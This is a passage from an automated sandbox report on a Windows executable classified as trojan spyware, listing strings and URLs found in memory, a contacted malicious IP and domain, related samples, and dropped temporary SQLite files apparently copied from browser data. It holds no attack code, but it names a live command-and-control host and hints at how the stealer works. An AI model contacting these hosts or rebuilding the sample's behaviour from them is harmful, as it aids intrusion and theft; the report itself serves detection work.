                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                        high
                                                        https://get.adob7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                          high
                                                          http://service.real.com/realplayer/security/02062012_player/en/7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://support.google.com/chrome/?p=plugin_shockwave7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://forms.rea7d9bXpW0im.exe, 00000001.00000002.258385381.00000000027A3000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://tempuri.org/Endpoint/GetUpdatesResponse7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://tempuri.org/Endpoint/EnvironmentSettingsResponse7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/chrome_newtabp7d9bXpW0im.exe, 00000001.00000003.250811151.000000000E791000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/soap/actor/next7d9bXpW0im.exe, 00000001.00000002.257632604.0000000002321000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=7d9bXpW0im.exe, 00000001.00000002.257837993.000000000249F000.00000004.00000001.sdmp, tmp2CF9.tmp.1.drfalse
                                                                        high
                                                                        https://api.ip.sb4/l7d9bXpW0im.exe, 00000001.00000002.257682885.0000000002379000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        141.136.0.194
                                                                        victairatu.xyzLatvia
                                                                        43513NANO-ASLVtrue

                                                                        General Information

                                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                                        Analysis ID:458956
                                                                        Start date:03.08.2021
                                                                        Start time:22:47:17
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 6m 5s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:7d9bXpW0im.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:21
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/21@5/1
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 0.9% (good quality ratio 0.5%)
                                                                        • Quality average: 38.9%
                                                                        • Quality standard deviation: 38.6%
                                                                        HCA Information:
                                                                        • Successful, ratio: 92%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 172.67.75.172, 104.26.13.31, 104.26.12.31, 20.82.209.183, 23.211.4.86, 40.112.88.60, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.82.210.154
                                                                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, vip1-par02p.wns.notify.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, wns.notify.trafficmanager.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        22:48:22API Interceptor69x Sleep call for process: 7d9bXpW0im.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        141.136.0.194JY2WV2vcxy.exeGet hashmaliciousBrowse
                                                                        • readinglistforjuly9.xyz/
                                                                        kLRJewibGm.exeGet hashmaliciousBrowse
                                                                        • readinglistforjuly9.xyz/
                                                                        WWzUml7m53.exeGet hashmaliciousBrowse
                                                                        • readinglistforjuly9.xyz/
                                                                        e7V79qGVJT.exeGet hashmaliciousBrowse
                                                                        • readinglistforjuly9.xyz/

                                                                        Domains

                                                                        No context

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        NANO-ASLVSecuriteInfo.com.W32.AIDetect.malware1.4421.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        NKqz6BNPdi.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        JY2WV2vcxy.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        kLRJewibGm.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        4kWyL2w4wQGet hashmaliciousBrowse
                                                                        • 185.71.138.18
                                                                        64AF392E3667F1261AEB70AE530C4E47AF1BA01834B3C.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.113
                                                                        Dpjv8G9gX5.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        WWzUml7m53.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        e7V79qGVJT.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.194
                                                                        IsVEKYHPfW.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.74
                                                                        e0gtwzAmth.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        R9SMlzY1qf.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        5F8i5lJ4oT.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        nJmAgu7z7p.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        case_L0275390548.xlsbGet hashmaliciousBrowse
                                                                        • 141.136.0.170
                                                                        case_L0275390548.xlsbGet hashmaliciousBrowse
                                                                        • 141.136.0.170
                                                                        case_L0275390548.xlsbGet hashmaliciousBrowse
                                                                        • 141.136.0.170
                                                                        WFtMGdZxjT.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        seH7cBPXgW.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181
                                                                        5dS4AGw2fG.exeGet hashmaliciousBrowse
                                                                        • 141.136.0.181

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7d9bXpW0im.exe.log
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2502
                                                                        Entropy (8bit):5.3347050065951125
                                                                        Encrypted:false
                                                                        SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHxLHG1qHjS:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6p
                                                                        MD5:2BF079EA03BF5AB82640736A9F171908
                                                                        SHA1:232A8C975E57B3124752F9A9A97D769E7EFF6027
                                                                        SHA-256:FC5BCB6E64913F48A49217B6625EE6942D3C7C166AC7AB1F699662E782982F12
                                                                        SHA-512:CF536D0F7BF5668E4CF2E03A08745E1EF3F6FC21573D2BE9B194F31BC64878FB60CA3DCDDD30D39D41A732FDB39CE0305EE9C3AAD33AC90712D6D9DBB3921B95
                                                                        Malicious:true
                                                                        Reputation:low
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                        C:\Users\user\AppData\Local\Temp\tmp2C93.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2C94.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2C95.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2C96.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2C97.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2CC7.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2CC8.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2CC9.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2CF9.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp2CFA.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp3EB.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.6970840431455908
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp3EC.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.6970840431455908
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp5591.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmp5592.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):73728
                                                                        Entropy (8bit):1.1874185457069584
                                                                        Encrypted:false
                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpB150.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpB151.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
